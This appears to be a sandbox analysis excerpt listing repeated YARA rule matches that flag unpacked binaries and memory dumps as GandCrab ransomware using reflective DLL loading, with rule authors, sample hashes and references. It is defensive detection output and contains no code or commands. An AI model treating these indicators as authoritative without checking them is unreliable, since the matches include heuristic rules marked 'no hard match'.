Source: 18.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 18.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 28.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 28.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 28.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 28.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 28.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 15.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 15.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 15.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 15.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 15.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 18.3.wzltxa.exe.3a80000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 18.3.wzltxa.exe.3a80000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 18.3.wzltxa.exe.3a80000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 18.3.wzltxa.exe.3a80000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 18.3.wzltxa.exe.3a80000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 31.3.wzltxa.exe.3b90000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 31.3.wzltxa.exe.3b90000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 31.3.wzltxa.exe.3b90000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 31.3.wzltxa.exe.3b90000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 31.3.wzltxa.exe.3b90000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 15.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 15.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 15.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 15.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 15.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.3.mPNVrHIpyt.exe.3e00000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.3.mPNVrHIpyt.exe.3e00000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.3.mPNVrHIpyt.exe.3e00000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.3.mPNVrHIpyt.exe.3e00000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.3.mPNVrHIpyt.exe.3e00000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 20.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 20.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 30.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 30.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 20.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 30.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 20.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 20.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 30.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 30.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 27.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 27.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 27.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 27.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 27.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 25.3.wzltxa.exe.3a00000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 25.3.wzltxa.exe.3a00000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 25.3.wzltxa.exe.3a00000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 25.3.wzltxa.exe.3a00000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 25.3.wzltxa.exe.3a00000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 40.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 40.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 40.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 40.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 40.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.2.mPNVrHIpyt.exe.f690000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0.2.mPNVrHIpyt.exe.f690000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0.2.mPNVrHIpyt.exe.f690000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.mPNVrHIpyt.exe.f690000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0.2.mPNVrHIpyt.exe.f690000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 22.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 22.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 22.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 22.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 22.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 33.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 33.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 33.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 33.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 33.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 28.3.wzltxa.exe.38a0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 28.3.wzltxa.exe.38a0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 28.3.wzltxa.exe.38a0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 28.3.wzltxa.exe.38a0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 28.3.wzltxa.exe.38a0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 28.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 28.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 28.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 28.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 28.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 39.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 39.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 39.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 39.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 39.0.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 12.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 12.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 12.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 12.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 12.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 31.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 31.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 31.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 31.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 31.2.wzltxa.exe.fbb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0000001F.00000003.539610642.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 0000001F.00000003.539610642.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 0000001F.00000003.539610642.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0000001F.00000003.539610642.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 0000001F.00000003.539610642.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0000000C.00000003.343975450.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
